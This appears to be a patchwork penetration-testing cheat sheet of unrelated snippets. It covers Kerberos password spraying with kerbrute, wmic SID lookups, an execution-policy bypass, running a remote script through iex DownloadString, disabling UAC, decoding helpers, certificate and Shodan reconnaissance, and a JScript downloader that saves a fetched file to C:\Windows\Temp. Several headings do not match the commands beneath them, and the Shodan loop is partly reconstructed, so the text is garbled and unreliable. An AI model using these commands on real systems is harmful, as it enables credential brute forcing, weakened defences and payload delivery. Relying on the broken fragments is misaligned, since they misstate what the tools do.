With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
wmic useraccount where name='test_user' get sid
wmic useraccount where (name='test_user' and domain='corp.com') get sid
wmic useraccount where sid='S-1-3-12-12451234567-1234567890-1234567-1434' get name
#Bypass Execution Policy
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
#Install boxstarter
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://boxstarter.org/bootstrapper.ps1')); Get-Boxstarter -Force
#Disable UAC
Disable-UAC
#Disable Microsoft Update
MITRE ATT&CK
------------
MITRE ATT&CK®: https://attack.mitre.org
Getting Started with ATT&CK: Detection and Analytics: https://medium.com/mitre-attack/getting-started-with-attack-detection-a8e49e4960d0
Getting Started with ATT&CK: Adversary Emulation and Red Teaming: https://medium.com/mitre-attack/getting-started-with-attack-red-29f074ccf7e3
# Single-byte XOR: every character of data is XORed with the same key value (0-255)
def xor(data, key):
    translated = ""
    for ch in data:
        translated += chr(ord(ch) ^ key)
    return translated
import base64
# Standard base64 alphabet and the custom (shuffled) alphabet the data was encoded with
chr_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
non_chr_set = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz="
encoded = "G6JgP6w="
# Map each character from the custom alphabet back to the standard one, then decode normally
re_encoded = ""
for en_chr in encoded:
    re_encoded += chr_set[non_chr_set.find(en_chr)]
print(re_encoded)                    # SGVsbG8=
print(base64.b64decode(re_encoded))  # b'Hello'
import base64
plain_text = "One"
encoded = base64.b64encode(plain_text.encode())  # b64encode takes bytes, not str
print(encoded)   # b'T25l'
decoded = base64.b64decode(encoded)
print(decoded)   # b'One'
certstream | grep -E "\.org\.com$"
curl -s "https://certspotter.com/api/v0/certs?domain=org.com" | jq
from shodan import Shodan, APIError
import ipaddress
import pprint

pp = pprint.PrettyPrinter(indent=2)
api = Shodan('<SHODAN_API_KEY>')      # placeholder: the API key is not given on the page
net = ipaddress.ip_network('<CIDR>')  # placeholder: the network is not given on the page
for xIp in net.hosts():
    # the loop body is absent from the page; a per-host Shodan lookup is assumed here
    try:
        pp.pprint(api.host(str(xIp)))
    except APIError as e:
        print(xIp, e)
// JScript: fetch the URL passed as the first script argument over WinHttp
// and write the raw response body to disk through ADODB.Stream
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;  // adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("c:\\Windows\\Temp\\file.txt", 2);  // 2 = adSaveCreateOverWrite, otherwise SaveToFile fails if the file exists